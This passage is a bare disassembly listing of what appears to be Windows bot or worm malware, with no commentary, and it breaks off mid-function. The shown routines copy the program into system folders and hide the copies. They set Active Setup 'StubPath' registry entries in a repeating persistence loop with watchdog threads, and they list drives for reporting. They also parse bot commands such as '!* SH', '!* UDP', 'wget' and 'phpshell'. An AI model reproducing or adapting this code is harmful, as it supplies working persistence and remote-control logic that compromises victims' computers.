push offset aSSpoolDriversS ; "%s\\spool\\drivers\\%s"
lea eax, [ebp+var_104]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_104]
push 1
push eax
mov edi, offset dword_439134
push offset dword_439578
push edi
push 80000001h
call sub_41A8F2
lea eax, [ebp+var_104]
push 1
push eax
push offset dword_439578
jmp loc_414CA3
; ---------------------------------------------------------------------------
loc_414BDC: ; CODE XREF: sub_414983+10F�j
lea eax, [ebp+var_208]
push eax
push ebx
push ebx
push 802Bh
push ebx
call dword_42F238
test eax, eax
jl loc_414CEA
lea eax, [ebp+var_208]
push eax
push offset aSSystem ; "%s\\System"
lea eax, [ebp+var_104]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp+var_208]
push ebx
push eax
call dword_42F0C4 ; CreateDirectoryA
test eax, eax
jnz short loc_414C36
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 3
jz loc_414ABA
loc_414C36: ; CODE XREF: sub_414983+2A2�j
lea eax, [ebp+var_104]
push 7
push eax
call dword_42F08C ; SetFileAttributesA
lea eax, [ebp+var_104]
push eax
lea eax, [ebp+var_30C]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_104]
push offset loc_439030
push eax
push offset dword_43C270
lea eax, [ebp+var_104]
push esi
push eax
call sub_42219B
lea eax, [ebp+var_104]
push 1
push eax
mov edi, offset dword_439134
push offset dword_439568
push edi
push 80000001h
call sub_41A8F2
lea eax, [ebp+var_104]
push 1
push eax
push offset dword_439568
loc_414CA3: ; CODE XREF: sub_414983+1E0�j
; sub_414983+254�j
push edi
push dword_439130
call sub_41A8F2
add esp, 48h
loc_414CB2: ; CODE XREF: sub_414983+120�j
; sub_414983+16C�j
lea eax, [ebp+var_410]
push esi
push eax
push ebx
call dword_42F154 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push ebx
push eax
lea eax, [ebp+var_410]
push eax
call dword_42F09C ; CopyFileA
lea eax, [ebp+var_104]
push 7
push eax
call dword_42F08C ; SetFileAttributesA
xor eax, eax
inc eax
jmp short loc_414CEC
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_414983+270�j
xor eax, eax
loc_414CEC: ; CODE XREF: sub_414983+365�j
pop edi
pop esi
pop ebx
leave
retn
sub_414983 endp
; =============== S U B R O U T I N E =======================================
sub_414CF1 proc near ; DATA XREF: sub_412267+438�o
; sub_414FE3+7E�o
push esi
xor esi, esi
loc_414CF4: ; CODE XREF: sub_414CF1+E�j
push esi
call loc_414A40
inc esi
pop ecx
cmp esi, 5
jl short loc_414CF4
push 0
call dword_42F150 ; ExitThread
pop esi
loc_414D0A: ; CODE XREF: sub_414F1C+4�p
push ebp
mov ebp, esp
sub esp, 30Ch
mov eax, [ebp+8]
push ebx
mov ebx, dword_42F08C
push esi
dec eax
push edi
jz loc_414E31
dec eax
jz loc_414DDD
dec eax
jz short loc_414D89
dec eax
jnz loc_414EF5
xor edi, edi
lea eax, [ebp-104h]
push edi
push 18h
push eax
push edi
call dword_42F234
mov esi, 104h
loc_414D4F: ; CODE XREF: sub_414CF1+19B�j
lea eax, [ebp-104h]
push eax
lea eax, [ebp-30Ch]
push esi
push eax
call sub_42219B
lea eax, [ebp-104h]
push offset loc_439030
push eax
push offset dword_43C270
lea eax, [ebp-208h]
push esi
push eax
call sub_42219B
add esp, 20h
jmp loc_414EF5
; ---------------------------------------------------------------------------
loc_414D89: ; CODE XREF: sub_414CF1+3D�j
xor edi, edi
lea eax, [ebp-104h]
push edi
push 25h
push eax
push edi
call dword_42F234
lea eax, [ebp-104h]
mov esi, 104h
push eax
lea eax, [ebp-30Ch]
push esi
push eax
call sub_42219B
lea eax, [ebp-104h]
push offset loc_439030
push eax
push offset aSWinsS ; "%s\\wins\\%s"
lea eax, [ebp-208h]
push esi
push eax
call sub_42219B
mov edi, offset dword_439590
jmp loc_414ED4
; ---------------------------------------------------------------------------
loc_414DDD: ; CODE XREF: sub_414CF1+36�j
xor edi, edi
lea eax, [ebp-104h]
push edi
push 25h
push eax
push edi
call dword_42F234
lea eax, [ebp-104h]
mov esi, 104h
push eax
lea eax, [ebp-30Ch]
push esi
push eax
call sub_42219B
lea eax, [ebp-104h]
push offset loc_439030
push eax
push offset aSSpoolDriversS ; "%s\\spool\\drivers\\%s"
lea eax, [ebp-208h]
push esi
push eax
call sub_42219B
mov edi, offset dword_439578
jmp loc_414ED4
; ---------------------------------------------------------------------------
loc_414E31: ; CODE XREF: sub_414CF1+2F�j
lea eax, [ebp-104h]
xor edi, edi
push eax
push edi
push edi
push 802Bh
push edi
call dword_42F238
test eax, eax
jl loc_414F15
lea eax, [ebp-104h]
mov esi, 104h
push eax
push offset aSSystem ; "%s\\System"
lea eax, [ebp-208h]
push esi
push eax
call sub_42219B
add esp, 10h
lea eax, [ebp-104h]
push edi
push eax
call dword_42F0C4 ; CreateDirectoryA
test eax, eax
jnz short loc_414E92
call dword_42F068 ; RtlGetLastWin32Error
cmp eax, 3
jz loc_414D4F
loc_414E92: ; CODE XREF: sub_414CF1+190�j
lea eax, [ebp-208h]
push 7
push eax
call ebx ; dword_42F08C
lea eax, [ebp-208h]
push eax
lea eax, [ebp-30Ch]
push esi
push eax
call sub_42219B
lea eax, [ebp-208h]
push offset loc_439030
push eax
push offset dword_43C270
lea eax, [ebp-208h]
push esi
push eax
call sub_42219B
mov edi, offset dword_439568
loc_414ED4: ; CODE XREF: sub_414CF1+E7�j
; sub_414CF1+13B�j
mov esi, offset dword_439134
push edi
push esi
push dword_439130
call sub_41A454
push edi
push esi
push 80000001h
call sub_41A454
add esp, 38h
loc_414EF5: ; CODE XREF: sub_414CF1+40�j
; sub_414CF1+93�j
lea eax, [ebp-208h]
push 80h
push eax
call ebx ; dword_42F08C
lea eax, [ebp-208h]
push eax
call dword_42F088 ; DeleteFileA
xor eax, eax
inc eax
jmp short loc_414F17
; ---------------------------------------------------------------------------
loc_414F15: ; CODE XREF: sub_414CF1+159�j
xor eax, eax
loc_414F17: ; CODE XREF: sub_414CF1+222�j
pop edi
pop esi
pop ebx
leave
retn
sub_414CF1 endp
; =============== S U B R O U T I N E =======================================
sub_414F1C proc near ; DATA XREF: sub_40CDE2+5FA�o
; sub_41F455+11�o
push esi
xor esi, esi
loc_414F1F: ; CODE XREF: sub_414F1C+E�j
push esi
call loc_414D0A
inc esi
pop ecx
cmp esi, 5
jl short loc_414F1F
push 0
call dword_42F150 ; ExitThread
pop esi
sub_414F1C endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F35 proc near ; CODE XREF: sub_4120E9+153�p
; sub_414FE3+93�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 400h
push esi
lea eax, [ebp+var_400]
push [ebp+arg_0]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Active Setup\\Install"...
push 400h
push eax
call sub_42219B
push 1
mov esi, offset aStubpath ; "StubPath"
push [ebp+arg_4]
lea eax, [ebp+var_400]
push esi
push eax
push 80000002h
call sub_41A8F2
push 1
lea eax, [ebp+var_400]
push [ebp+arg_4]
push esi
push eax
push 80000001h
call sub_41A8F2
add esp, 38h
pop esi
leave
retn
sub_414F35 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_414F91 proc near ; CODE XREF: sub_40CDE2+60C�p
; sub_41F455+23�p
var_400 = byte ptr -400h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 400h
push esi
lea eax, [ebp+var_400]
push [ebp+arg_0]
push offset aSoftwareMicr_1 ; "Software\\Microsoft\\Active Setup\\Install"...
push 400h
push eax
call sub_42219B
mov esi, offset aStubpath ; "StubPath"
lea eax, [ebp+var_400]
push esi
push eax
push 80000002h
call sub_41A454
lea eax, [ebp+var_400]
push esi
push eax
push 80000001h
call sub_41A454
add esp, 28h
pop esi
leave
retn
sub_414F91 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
sub_414FE3 proc near ; DATA XREF: sub_412267+448�o
var_108 = byte ptr -108h
var_4 = byte ptr -4
push ebp
mov ebp, esp
sub esp, 108h
push ebx
push esi
push edi
lea eax, [ebp+var_108]
push 104h
push eax
push 0
call dword_42F074 ; GetModuleHandleA
push eax
call dword_42F154 ; GetModuleFileNameA
mov esi, dword_42F158
mov ebx, offset byte_439233
mov edi, offset dword_439134
loc_41501A: ; CODE XREF: sub_414FE3+A5�j
lea eax, [ebp+var_108]
push 1
push eax
push ebx
push edi
push 80000001h
call sub_41A8F2
lea eax, [ebp+var_108]
push 1
push eax
push ebx
push edi
push dword_439130
call sub_41A8F2
add esp, 28h
lea eax, [ebp+var_4]
push eax
xor eax, eax
push eax
push eax
push offset sub_414983
push eax
push eax
call esi ; dword_42F158
lea eax, [ebp+var_4]
push eax
xor eax, eax
push eax
push eax
push offset sub_414CF1
push eax
push eax
call esi ; dword_42F158
lea eax, [ebp+var_108]
push eax
push offset dword_439540
call sub_414F35
pop ecx
pop ecx
push 0BB8h
call dword_42F15C ; Sleep
jmp short loc_41501A
sub_414FE3 endp
; =============== S U B R O U T I N E =======================================
sub_41508A proc near ; CODE XREF: sub_4152FB:loc_415352�p
; sub_4152FB+94�p
arg_0 = dword ptr 4
push [esp+arg_0]
call dword_42F0C8 ; GetDriveTypeA
sub eax, 0
jz short loc_4150CD
dec eax
jz short loc_4150C7
dec eax
dec eax
jz short loc_4150C1
dec eax
jz short loc_4150BB
dec eax
jz short loc_4150B5
dec eax
jz short loc_4150AF
mov eax, offset a? ; "?"
retn
; ---------------------------------------------------------------------------
loc_4150AF: ; CODE XREF: sub_41508A+1D�j
mov eax, offset aRamdisk ; "RAMDISK"
retn
; ---------------------------------------------------------------------------
loc_4150B5: ; CODE XREF: sub_41508A+1A�j
mov eax, offset aCdrom ; "Cdrom"
retn
; ---------------------------------------------------------------------------
loc_4150BB: ; CODE XREF: sub_41508A+17�j
mov eax, offset aNetwork ; "Network"
retn
; ---------------------------------------------------------------------------
loc_4150C1: ; CODE XREF: sub_41508A+14�j
mov eax, offset aDisk ; "Disk"
retn
; ---------------------------------------------------------------------------
loc_4150C7: ; CODE XREF: sub_41508A+10�j
mov eax, offset aInvalid ; "Invalid"
retn
; ---------------------------------------------------------------------------
loc_4150CD: ; CODE XREF: sub_41508A+D�j
mov eax, offset dword_43E558
retn
sub_41508A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4150D3 proc near ; CODE XREF: sub_415126+12�p
; sub_415255+F�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 18h
push esi
push edi
or eax, 0FFFFFFFFh
push 1
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
call dword_4543C0 ; SetErrorMode
lea eax, [ebp+var_10]
push eax
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_18]
push eax
push [ebp+arg_4]
call dword_42F0CC ; GetDiskFreeSpaceExA
push 2
call dword_4543C0 ; SetErrorMode
mov eax, [ebp+arg_0]
push 6
pop ecx
lea esi, [ebp+var_18]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_4150D3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415126 proc near ; CODE XREF: sub_4152FB+1D�p
var_1A0 = byte ptr -1A0h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1A0h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_18]
push eax
call sub_4150D3
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jz loc_415212
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jz loc_415212
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jz loc_415212
mov eax, [ebp+arg_8]
push ebx
push [ebp+arg_C]
cdq
mov ebx, eax
push edx
push ebx
mov [ebp+var_1C], edx
push [ebp+var_14]
push [ebp+var_18]
call sub_4244E0
push edx
push eax
call sub_41F537
pop ecx
mov edi, offset aSS_2 ; "%s%s"
pop ecx
mov esi, 80h
push eax
push edi
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_42219B
add esp, 14h
push [ebp+arg_C]
push [ebp+var_1C]
push ebx
push [ebp+var_C]
push [ebp+var_10]
call sub_4244E0
push edx
push eax
call sub_41F537
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_120]
push esi
push eax
call sub_42219B
add esp, 14h
push [ebp+arg_C]
push [ebp+var_1C]
push ebx
push [ebp+var_4]
push [ebp+var_8]
call sub_4244E0
push edx
push eax
call sub_41F537
pop ecx
pop ecx
push eax
push edi
lea eax, [ebp+var_A0]
push esi
push eax
call sub_42219B
add esp, 14h
pop ebx
jmp short loc_415241
; ---------------------------------------------------------------------------
loc_415212: ; CODE XREF: sub_415126+2C�j
; sub_415126+3B�j ...
mov esi, offset aFailed ; "Failed"
lea eax, [ebp+var_1A0]
push esi
push eax
call sub_422063
lea eax, [ebp+var_120]
push esi
push eax
call sub_422063
lea eax, [ebp+var_A0]
push esi
push eax
call sub_422063
add esp, 18h
loc_415241: ; CODE XREF: sub_415126+EA�j
mov eax, [ebp+arg_0]
push 60h
pop ecx
lea esi, [ebp+var_1A0]
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_415126 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415255 proc near ; CODE XREF: sub_4153BB+5F�p
; sub_418B58+241�p
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 30h
push esi
push edi
push [ebp+arg_4]
lea eax, [ebp+var_30]
push eax
call sub_4150D3
pop ecx
mov esi, eax
pop ecx
lea edi, [ebp+var_18]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_18]
and eax, [ebp+var_14]
cmp eax, 0FFFFFFFFh
jnz short loc_4152A9
mov eax, [ebp+var_10]
and eax, [ebp+var_C]
cmp eax, 0FFFFFFFFh
jnz short loc_4152A9
mov eax, [ebp+var_8]
and eax, [ebp+var_4]
cmp eax, 0FFFFFFFFh
jnz short loc_4152A9
xor eax, eax
mov [ebp+var_30], eax
mov [ebp+var_2C], eax
mov [ebp+var_28], eax
mov [ebp+var_24], eax
mov [ebp+var_1C], eax
jmp short loc_4152E7
; ---------------------------------------------------------------------------
loc_4152A9: ; CODE XREF: sub_415255+29�j
; sub_415255+34�j ...
mov eax, [ebp+arg_8]
cdq
mov edi, edx
mov esi, eax
push edi
push esi
push [ebp+var_14]
push [ebp+var_18]
call sub_4244E0
push edi
push esi
push [ebp+var_C]
mov [ebp+var_30], eax
mov [ebp+var_2C], edx
push [ebp+var_10]
call sub_4244E0
push edi
push esi
push [ebp+var_4]
mov [ebp+var_28], eax
mov [ebp+var_24], edx
push [ebp+var_8]
call sub_4244E0
mov [ebp+var_1C], edx
loc_4152E7: ; CODE XREF: sub_415255+52�j
mov [ebp+var_20], eax
mov eax, [ebp+arg_0]
push 6
lea esi, [ebp+var_30]
pop ecx
mov edi, eax
rep movsd
pop edi
pop esi
leave
retn
sub_415255 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4152FB proc near ; CODE XREF: sub_4154DA+40�p
; sub_4154DA+10C�p
var_300 = byte ptr -300h
var_180 = byte ptr -180h
var_100 = byte ptr -100h
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
push ebp
mov ebp, esp
sub esp, 300h
push ebx
mov ebx, [ebp+arg_C]
push esi
push edi
push [ebp+arg_14]
lea eax, [ebp+var_300]
push [ebp+arg_10]
push ebx
push eax
call sub_415126
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_300]
rep movsd
push 60h
lea esi, [ebp+var_300]
pop ecx
lea edi, [ebp+var_180]
lea eax, [ebp+var_80]
push offset aFailed ; "Failed"
rep movsd
push eax
call sub_422760
add esp, 18h
test eax, eax
jnz short loc_41537B
push ebx
push ebx
loc_415352: ; DATA XREF: .text:off_43CF08�o
call sub_41508A
cmp [ebp+arg_8], 0
pop ecx
push eax
push offset aSDriveSFailedT ; "%s Drive (%s): Failed to start, device "...
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_415374
call sub_4104F6
loc_41536F: ; CODE XREF: sub_4152FB+7E�j
add esp, 14h
jmp short loc_4153B6
; ---------------------------------------------------------------------------
loc_415374: ; CODE XREF: sub_4152FB+6D�j
call sub_410491
jmp short loc_41536F
; ---------------------------------------------------------------------------
loc_41537B: ; CODE XREF: sub_4152FB+53�j
lea eax, [ebp+var_180]
push eax
lea eax, [ebp+var_100]
push eax
lea eax, [ebp+var_80]
push eax
push ebx
push ebx
call sub_41508A
cmp [ebp+arg_8], 0
pop ecx
push eax
push offset aSDriveSTotalSF ; "%s Drive (%s), Total: %s, Free: %s, Ava"...
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_4153AE
call sub_4104F6
jmp short loc_4153B3
; ---------------------------------------------------------------------------
loc_4153AE: ; CODE XREF: sub_4152FB+AA�j
call sub_410491
loc_4153B3: ; CODE XREF: sub_4152FB+B1�j
add esp, 20h
loc_4153B6: ; CODE XREF: sub_4152FB+77�j
pop edi
pop esi
pop ebx
leave
retn
sub_4152FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4153BB proc near ; CODE XREF: sub_403B2C+1F28�p
; sub_4154DA+158�p
var_E8 = byte ptr -0E8h
var_B4 = byte ptr -0B4h
var_80 = byte ptr -80h
var_4C = byte ptr -4Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 0E8h
push ebx
push esi
mov esi, dword_42F0D0
xor eax, eax
push edi
push eax
push eax
mov [ebp+var_8], eax
mov [ebp+var_4], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
call esi ; dword_42F0D0
lea edi, [eax+2]
push edi
call sub_422F79
pop ecx
mov ebx, eax
push ebx
push edi
call esi ; dword_42F0D0
cmp byte ptr [ebx], 0
mov [ebp+var_14], ebx
jz short loc_415466
loc_4153FD: ; CODE XREF: sub_4153BB+A9�j
push offset off_43E640
push [ebp+var_14]
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_415450
push [ebp+arg_C]
lea eax, [ebp+var_4C]
push [ebp+var_14]
push eax
call sub_415255
add esp, 0Ch
mov esi, eax
lea edi, [ebp+var_34]
push 6
pop ecx
rep movsd
mov eax, [ebp+var_34]
add [ebp+var_8], eax
mov eax, [ebp+var_30]
adc [ebp+var_4], eax
mov eax, [ebp+var_2C]
add [ebp+var_10], eax
mov eax, [ebp+var_28]
adc [ebp+var_C], eax
mov eax, [ebp+var_24]
add [ebp+var_1C], eax
mov eax, [ebp+var_20]
adc [ebp+var_18], eax
loc_415450: ; CODE XREF: sub_4153BB+53�j
mov esi, [ebp+var_14]
push esi
call sub_422120
lea eax, [esi+eax+1]
pop ecx
mov [ebp+var_14], eax
cmp byte ptr [eax], 0
jnz short loc_4153FD
loc_415466: ; CODE XREF: sub_4153BB+40�j
push ebx
call sub_4230B3
pop ecx
pop edi
pop esi
pop ebx
push [ebp+arg_10]
lea eax, [ebp+var_80]
push eax
push [ebp+var_4]
push [ebp+var_8]
call sub_41F5B5
add esp, 0Ch
push eax
lea eax, [ebp+var_B4]
push [ebp+arg_10]
push eax
push [ebp+var_C]
push [ebp+var_10]
call sub_41F5B5
add esp, 0Ch
push eax
lea eax, [ebp+var_E8]
push [ebp+arg_10]
push eax
push [ebp+var_18]
push [ebp+var_1C]
call sub_41F5B5
add esp, 0Ch
cmp [ebp+arg_8], 0
push eax
push offset aDriveTotalsNAT ; "Drive Totals (N/A), Total: %s%s,Free: %"...
push [ebp+arg_0]
push [ebp+arg_4]
jnz short loc_4154D0
call sub_4104F6
jmp short loc_4154D5
; ---------------------------------------------------------------------------
loc_4154D0: ; CODE XREF: sub_4153BB+10C�j
call sub_410491
loc_4154D5: ; CODE XREF: sub_4153BB+113�j
add esp, 24h
leave
retn
sub_4153BB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4154DA proc near ; CODE XREF: sub_415686+52�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
mov eax, [ebp+arg_8]
push ebx
xor ebx, ebx
cmp eax, ebx
jz short loc_415533
cmp [ebp+arg_C], ebx
jnz short loc_4154FD
cmp [ebp+arg_10], ebx
jnz short loc_415527
push offset aKb ; "KB"
push 400h
jmp short loc_415510
; ---------------------------------------------------------------------------
loc_4154FD: ; CODE XREF: sub_4154DA+10�j
cmp [ebp+arg_10], ebx
jnz loc_415683
push offset aMb ; "MB"
push 100000h
loc_415510: ; CODE XREF: sub_4154DA+21�j
; sub_4154DA+57�j
push eax
push [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4152FB
add esp, 18h
jmp loc_415683
; ---------------------------------------------------------------------------
loc_415527: ; CODE XREF: sub_4154DA+15�j
push offset aGb ; "GB"
push 40000000h
jmp short loc_415510
; ---------------------------------------------------------------------------
loc_415533: ; CODE XREF: sub_4154DA+B�j
push esi
mov esi, dword_42F0D0
push edi
push ebx
push ebx
call esi ; dword_42F0D0
lea edi, [eax+2]
push edi
call sub_422F79
pop ecx
mov [ebp+arg_8], eax
push eax
push edi
call esi ; dword_42F0D0
cmp [ebp+arg_14], ebx
mov esi, offset aSListingDrives ; "%s Listing drives:"
jnz short loc_415573
cmp [ebp+arg_18], ebx
jnz short loc_415578
push offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 10h
loc_415573: ; CODE XREF: sub_4154DA+7E�j
cmp [ebp+arg_18], ebx
jz short loc_41558C
loc_415578: ; CODE XREF: sub_4154DA+83�j
push offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_410491
add esp, 10h
loc_41558C: ; CODE XREF: sub_4154DA+9C�j
mov esi, [ebp+arg_8]
mov ebx, offset aGb ; "GB"
mov eax, esi
mov edi, 40000000h
cmp byte ptr [eax], 0
jz short loc_4155FE
loc_4155A0: ; CODE XREF: sub_4154DA+122�j
push offset off_43E640
push esi
call sub_422760
pop ecx
test eax, eax
pop ecx
jz short loc_4155EE
xor eax, eax
cmp [ebp+arg_C], eax
jnz short loc_4155C9
cmp [ebp+arg_10], eax
jnz short loc_4155DA
push offset aKb ; "KB"
push 400h
jmp short loc_4155DC
; ---------------------------------------------------------------------------
loc_4155C9: ; CODE XREF: sub_4154DA+DC�j
cmp [ebp+arg_10], eax
jnz short loc_4155EE
push offset aMb ; "MB"
push 100000h
jmp short loc_4155DC
; ---------------------------------------------------------------------------
loc_4155DA: ; CODE XREF: sub_4154DA+E1�j
push ebx
push edi
loc_4155DC: ; CODE XREF: sub_4154DA+ED�j
; sub_4154DA+FE�j
push esi
push [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4152FB
add esp, 18h
loc_4155EE: ; CODE XREF: sub_4154DA+D5�j
; sub_4154DA+F2�j
push esi
call sub_422120
lea esi, [esi+eax+1]
pop ecx
cmp byte ptr [esi], 0
jnz short loc_4155A0
loc_4155FE: ; CODE XREF: sub_4154DA+C4�j
xor eax, eax
cmp [ebp+arg_C], eax
jnz short loc_415616
cmp [ebp+arg_10], eax
jnz short loc_415627
push offset aKb ; "KB"
push 400h
jmp short loc_415629
; ---------------------------------------------------------------------------
loc_415616: ; CODE XREF: sub_4154DA+129�j
cmp [ebp+arg_10], eax
jnz short loc_41563A
push offset aMb ; "MB"
push 100000h
jmp short loc_415629
; ---------------------------------------------------------------------------
loc_415627: ; CODE XREF: sub_4154DA+12E�j
push ebx
push edi
loc_415629: ; CODE XREF: sub_4154DA+13A�j
; sub_4154DA+14B�j
push [ebp+arg_18]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4153BB
add esp, 14h
loc_41563A: ; CODE XREF: sub_4154DA+13F�j
xor edi, edi
mov esi, offset aSEndOfList_ ; "%s End of list."
cmp [ebp+arg_14], edi
jnz short loc_41565F
cmp [ebp+arg_18], edi
jnz short loc_415664
push offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_4104F6
add esp, 10h
loc_41565F: ; CODE XREF: sub_4154DA+16A�j
cmp [ebp+arg_18], edi
jz short loc_415678
loc_415664: ; CODE XREF: sub_4154DA+16F�j
push offset aIvrum__ltyn0x9 ; "iVRum..LtyN0X9DHH1k06Rd1"
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_410491
add esp, 10h
loc_415678: ; CODE XREF: sub_4154DA+188�j
push [ebp+arg_8]
call sub_4230B3
pop ecx
pop edi
pop esi
loc_415683: ; CODE XREF: sub_4154DA+26�j
; sub_4154DA+48�j
pop ebx
pop ebp
retn
sub_4154DA endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_415686 proc near ; DATA XREF: sub_403B2C+1F75�o
var_240 = dword ptr -240h
var_23C = byte ptr -23Ch
var_1BC = dword ptr -1BCh
var_1B8 = dword ptr -1B8h
var_1AC = dword ptr -1ACh
var_1A8 = dword ptr -1A8h
var_18C = dword ptr -18Ch
var_188 = dword ptr -188h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 240h
mov eax, [ebp+arg_0]
push esi
push edi
mov ecx, 90h
mov esi, eax
lea edi, [ebp+var_240]
rep movsd
push [ebp+var_188]
mov dword ptr [eax+0BCh], 1
lea eax, [ebp+var_23C]
push [ebp+var_18C]
push [ebp+var_1A8]
push [ebp+var_1AC]
push [ebp+var_1B8]
push [ebp+var_240]
push eax
call sub_4154DA
push [ebp+var_1BC]
call sub_41C059
add esp, 20h
xor eax, eax
pop edi
pop esi
leave
retn 4
sub_415686 endp
; =============== S U B R O U T I N E =======================================
sub_4156F3 proc near ; CODE XREF: sub_415A65+190�p
; sub_415A65+1B8�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_455ECC, eax
mov eax, offset dword_455ECC
retn
sub_4156F3 endp
; =============== S U B R O U T I N E =======================================
sub_415702 proc near ; CODE XREF: sub_415A65+226�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
push offset dword_439648
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_41571C
loc_415718: ; CODE XREF: sub_415702+29�j
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_41571C: ; CODE XREF: sub_415702+14�j
push offset dword_439638
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_415718
push offset aSh ; "!* SH"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jz short loc_415743
loc_41573E: ; CODE XREF: sub_415702+50�j
; sub_415702+61�j ...
xor eax, eax
pop esi
inc eax
retn
; ---------------------------------------------------------------------------
loc_415743: ; CODE XREF: sub_415702+3A�j
push offset aUdp ; "!* UDP"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aPan ; "!* PAN"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aPush ; "!* PUSH"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aWget ; "wget"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aPhpshell ; "phpshell"
push esi
call sub_4235C0
pop ecx
test eax, eax
pop ecx
jnz short loc_41573E
push offset aMain ; "[MAIN]:"
push esi
call sub_4235C0
pop ecx
